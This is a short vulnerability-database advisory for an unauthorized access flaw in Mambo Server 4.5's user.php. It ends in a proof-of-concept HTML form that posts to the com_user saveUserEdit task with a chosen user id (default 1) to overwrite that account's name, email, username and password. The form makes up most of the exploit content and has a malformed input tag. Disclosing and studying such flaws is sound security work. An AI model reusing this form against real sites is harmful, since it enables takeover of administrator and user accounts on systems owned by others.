Mambo 4.5 Server user.php Script Unauthorized Access Vulnerability

ID SSV:77193
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


It has been reported that Mambo Server may be prone to an unauthorized access vulnerability that may allow an attacker to modify a user and/or an administrator's information such as password, email, name etc, after supplying a legitimate user id.

Mambo Server version 4.5 Beta 1.0.3 has been reported to be vulnerable to this issue, however other versions could be affected as well. 

<form action="" method="post">
New Name : <inputtype="text" name="name" value=""><br>
New E-mail : <input type="text" name="email" value="" size="30"><br>
New UserName : <input type="text" name="username" value=""><br>
New Password : <input type="password" name="password" value=""><br>
Verfiy New Pass : <input type="password" name="verifyPass"><br>
ID : <input type="text" name="id" value="1"><br>
<input type="hidden" name="option" value="com_user">
<input type="hidden" name="task" value="saveUserEdit">
<input type="submit" name="submit" value="Update"><br>